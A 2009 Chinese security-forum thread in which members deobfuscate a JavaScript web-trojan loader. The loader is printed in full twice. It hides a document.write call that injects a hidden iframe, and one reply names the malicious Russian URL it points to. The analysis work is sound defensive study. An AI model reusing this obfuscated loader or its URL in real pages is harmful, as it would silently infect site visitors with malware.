瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 解一下这段
kekao - 2009-11-4 19:45:00
地址忘记了,只保留这段代码.看看能解出什么.:kaka2:
<SCRIPT>function EHiIJePEcw(ulpCsvj){ window.eval(); fff=op.split("808");var cfR = document.getElementById('mmqTtKlM'); fff=op.split("808"); }
function MWmC(BearIYRq){var mKV=7,YkbYJCT=6;var oxoIbl='70,0-122,3-119,0-133,0-113,1-127,1-117,5-37,2-138,5-122,3-116,4-135,2-121,2-71,1-57,1-37,2-121,2-117,5-122,3-120,1-121,2-135,2-71,1-57,1-37,2-114,2-129,3-133,0-116,4-117,5-133,0-71,1-56,0-37,2-119,0-133,0-113,1-127,1-117,5-114,2-129,3-133,0-116,4-117,5-133,0-71,1-56,0-37,2-134,1-133,0-',zaT=oxoIbl.split('-');axqOJ='';for(kwyB=-0x27+0xb+0x7-0x20-0x2b-0x15-0x24+0x99;kwyB<zaT.length-1;kwyB+=-0x11+0x5+0x1f-0x1a+0x15-0xd){ lkIybN=zaT[kwyB].split(',');QgApMlQ = parseInt(lkIybN[0]*YkbYJCT)+parseInt(lkIybN[1]);QgApMlQ = parseInt(QgApMlQ)/mKV;axqOJ += String.fromCharCode(QgApMlQ);}return axqOJ;}function YZa(oeX){ var pJl = document.getElementById('qOelcWasl'); fff.op.replace("349"); }
function AEvZVPZNFD(LIFcfdLH){var HJyQJCh=3,jeZdGOQ=6;var KjHEXEIdkJ='49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-',lriKMwwx=KjHEXEIdkJ.split('-');JfjXEx='';for(ZgTXVDgz=-0x16-0x27+0xb+0x32;ZgTXVDgz<lriKMwwx.length-1;ZgTXVDgz+=-0x29-0xd-0x2+0x39){ FFnqTqfmLG=lriKMwwx[ZgTXVDgz].split(',');MrhQEK = parseInt(FFnqTqfmLG[0]*jeZdGOQ)+parseInt(FFnqTqfmLG[1]);MrhQEK = parseInt(MrhQEK)/HJyQJCh;JfjXEx += String.fromCharCode(MrhQEK);}return JfjXEx;}function pEoRMK(XZSID){ window.eval(); }
function dHIw(tjOXAMWOgY){var hKIOWv=3,RWSAZ=2;var cEIlpbf='145,1-163,1-151,1-93,0-',cZEvzvzVm=cEIlpbf.split('-');LhYWR='';for(wyKQ=0x27+0x17+0x29-0x27+0x1a+0x28-0x82;wyKQ<cZEvzvzVm.length-1;wyKQ+=0x7+0x28-0x16+0x2a-0x42){ PxBIqahRH=cZEvzvzVm[wyKQ].split(',');flmVPcepJ = parseInt(PxBIqahRH[0]*RWSAZ)+parseInt(PxBIqahRH[1]);flmVPcepJ = parseInt(flmVPcepJ)/hKIOWv;LhYWR += String.fromCharCode(flmVPcepJ);}return LhYWR;}function pmRHfFR(pgnrM){ alert('HSvAcVduec');alert('HSvAcVduec');window.eval(); }
document['w1048r1089i2324t9206e47288999'.replace(/[0-9]/g,'')](MWmC('PofcUQAK'),AEvZVPZNFD('IvcfFGzPPr'),dHIw('Mjqk'));function KclHkhdGZ(QKOQPtxhyR){ var sAGUIHGGR = document.getElementById('yZQx'); fff.op.replace("218"); }
function RIgCFtAxxz(tArQ){  fff.op.replace("174");alert('THFHkBk');var YuqvP=new Function("bRTF", "return 57690;"); }
</SCRIPT>

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
aaccbbdd - 2009-11-4 20:49:00
神器里保持原状运行看看结果
shadowmin - 2009-11-4 20:55:00
http://beautymoda.ru/templates/index.php
kekao - 2009-11-4 21:07:00
详细说一下过程.
aaccbbdd - 2009-11-4 21:12:00
将eval全换为alert
在神器里运行看看
shadowmin - 2009-11-4 21:24:00
document['w1048r1089i2324t9206e47288999'.replace(/[0-9]/g,'')](MWmC('PofcUQAK'),AEvZVPZNFD('IvcfFGzPPr'),dHIw('Mjqk'));
这个是document.write,里面有三个函数,好像执行的时候一次只能执行一个,所以,每次删除一个,就得到了。
如先执行一下,删除,”MWmC('PofcUQAK'),“在执行一次,就出来了
在神器,在redoce中都可以。
天涯浪子1988 - 2009-11-5 16:54:00
无法学习  无法膜拜 唯有望尘莫及
kekao - 2009-11-5 17:32:00
修改为document['w1048r1089i2324t9206e47288999'.replace(/[0-9]/g,'')](MWmC('PofcUQAK')+AEvZVPZNFD('IvcfFGzPPr')+dHIw('Mjqk'));
保存html运行.开始没看清楚.:kaka6:
天涯浪子1988 - 2009-11-5 17:39:00
你在改什么:kaka2: :kaka2:  shadowmin 没说那么改
kekao - 2009-11-5 17:45:00
难道改错了.手动解一下.没用工具.:kaka12:
天涯浪子1988 - 2009-11-5 17:46:00
document['w1048r1089i2324t9206e47288999'.replace(/[0-9]/g,'')]这个改成document.write
document.write执行了三个函数 网马地址藏在第二个函数里



    <SCRIPT>function EHiIJePEcw(ulpCsvj)
{
  window.eval();
  fff=op.split("808");
  var cfR = document.getElementById('mmqTtKlM');
  fff=op.split("808");
 
}
function MWmC(BearIYRq)
{
  var mKV=7,YkbYJCT=6;
  var oxoIbl='70,0-122,3-119,0-133,0-113,1-127,1-117,5-37,2-138,5-122,3-116,4-135,2-121,2-71,1-57,1-37,2-121,2-117,5-122,3-120,1-121,2-135,2-71,1-57,1-37,2-114,2-129,3-133,0-116,4-117,5-133,0-71,1-56,0-37,2-119,0-133,0-113,1-127,1-117,5-114,2-129,3-133,0-116,4-117,5-133,0-71,1-56,0-37,2-134,1-133,0-',zaT=oxoIbl.split('-');
  axqOJ='';
  for(kwyB=-0x27+0xb+0x7-0x20-0x2b-0x15-0x24+0x99;
  kwyB<zaT.length-1;
  kwyB+=-0x11+0x5+0x1f-0x1a+0x15-0xd)
  {
    lkIybN=zaT[kwyB].split(',');
    QgApMlQ = parseInt(lkIybN[0]*YkbYJCT)+parseInt(lkIybN[1]);
    QgApMlQ = parseInt(QgApMlQ)/mKV;
    axqOJ += String.fromCharCode(QgApMlQ);
  }
  return axqOJ;
}
function YZa(oeX)
{
  var pJl = document.getElementById('qOelcWasl');
  fff.op.replace("349");
 
}
function AEvZVPZNFD(LIFcfdLH)
{
  var HJyQJCh=3,jeZdGOQ=6;
  var KjHEXEIdkJ='49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-',lriKMwwx=KjHEXEIdkJ.split('-');
  JfjXEx='';
  for(ZgTXVDgz=-0x16-0x27+0xb+0x32;
  ZgTXVDgz<lriKMwwx.length-1;
  ZgTXVDgz+=-0x29-0xd-0x2+0x39)
  {
    FFnqTqfmLG=lriKMwwx[ZgTXVDgz].split(',');
    MrhQEK = parseInt(FFnqTqfmLG[0]*jeZdGOQ)+parseInt(FFnqTqfmLG[1]);
    MrhQEK = parseInt(MrhQEK)/HJyQJCh;
    JfjXEx += String.fromCharCode(MrhQEK);
  }
  return JfjXEx;
}
function pEoRMK(XZSID)
{
  window.eval();
 
}
function dHIw(tjOXAMWOgY)
{
  var hKIOWv=3,RWSAZ=2;
  var cEIlpbf='145,1-163,1-151,1-93,0-',cZEvzvzVm=cEIlpbf.split('-');
  LhYWR='';
  for(wyKQ=0x27+0x17+0x29-0x27+0x1a+0x28-0x82;
  wyKQ<cZEvzvzVm.length-1;
  wyKQ+=0x7+0x28-0x16+0x2a-0x42)
  {
    PxBIqahRH=cZEvzvzVm[wyKQ].split(',');
    flmVPcepJ = parseInt(PxBIqahRH[0]*RWSAZ)+parseInt(PxBIqahRH[1]);
    flmVPcepJ = parseInt(flmVPcepJ)/hKIOWv;
    LhYWR += String.fromCharCode(flmVPcepJ);
  }
  return LhYWR;
}
function pmRHfFR(pgnrM)
{
  alert('HSvAcVduec');
  alert('HSvAcVduec');
  window.eval();
 
}
document.write(AEvZVPZNFD('IvcfFGzPPr'));
  </SCRIPT>
document清除就得到了  当然document.write改alert放浏览器里执行也可以
shadowmin - 2009-11-5 21:52:00
8L的方法更科学。
我的方法有些土。
天涯浪子1988 - 2009-11-5 22:25:00
呵呵 主要是个修改代码的问题  好让浏览器能读出我们希望达到的效果 
不过我主要说的是document.write没改放浏览器执行不等于直接执行恶意代码了么:kaka12:
1
查看完整版本: 解一下这段